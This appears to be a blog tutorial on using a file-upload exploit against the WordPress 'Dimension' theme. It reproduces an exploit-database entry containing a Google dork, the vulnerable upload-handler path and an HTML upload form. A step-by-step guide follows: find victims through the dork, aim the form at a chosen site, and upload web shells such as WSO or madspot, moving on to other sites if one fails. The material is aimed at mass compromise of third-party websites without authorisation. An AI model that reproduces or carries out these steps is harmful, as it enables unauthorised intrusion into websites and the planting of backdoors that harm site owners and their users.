How to use Remote File Upload Exploit with php script
Now, I will be guiding you all about using a type of exploit most often found in exploit database sites.
Look at the below exploit as an example :
-------------------------------------------
?#?Title? : Wordpress Dimension Themes CSRF File Upload Vulnerability
?#?Author? : DevilScreaM
?#?Date? : 11/17/2013 - 17 November 2013
?#?Category? : Web Applications
?#?Type? : PHP
?#?Vendor? : http://themeforest.net
?#?Download? : http://themeforest.net/item/dimension-retina-responsive-multipurpose-theme/
?#?Greetz? : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
?#?Thanks? : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
?#?Tested? : Mozila, Chrome, Opera -> Windows & Linux
?#?Vulnerabillity? : CSRF
?#?Dork? :
inurl:wp-content/themes/dimension
CSRF File Upload Vulnerability
Exploit & POC :
http://site-target/wp-content/themes/dimension/library/includes/upload-handler.php
Script :
<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/dimension/library/includes/upload-handler.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
File Access :
http://site-target/uploads/[years]/[month]/your_shell.php
Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php
-------------------------------------------
This is a wordpress exploit titled "Wordpress Dimension Themes CSRF File Upload Vulnerability"
to use this exploit, you will be required of a ftp server.or, install AppServ in your pc, which will allow you to execute php scripts in your browser.
STEP 1 : Download AppServ from internet
STEP 2 : Open notepad and paste "Script"(check in top.there are some php codes) and save file as "exploit.php" in public_html directory and paste any shells like madspot,wso,k2ll33d shells
STEP 3 : Search the given dork in google and select any site(note : if you can't find shell in shell location, you have to try another)
STEP 4 : Open the php file in notepad and find http://127.0.0.1/wp-content/themes/dimension/library/includes/upload-handler.php and replace the 127.0.0.1 with the site url you got
STEP 5 : Now save the php file and open in browser(make sure you have have AppServ successfully running)
STEP 6 : Select your shell and upload.Once after successful upload, you have to visit http://127.0.0.1/uploads/[years]/[month]/your_shell.php (http://127.0.0.1/wp-content/uploads/2016/01/madspot.php)
STEP 7 : If the site is vulnerable, your shell should be planted successfully.If there is no shell, try other sites.
N.B : All exploits of this type can be used using this way...Some exploits attempts to upload shell.php automatically(ex. wordpress rightnow theme vulnerability).
./The_End
No comments:
Post a Comment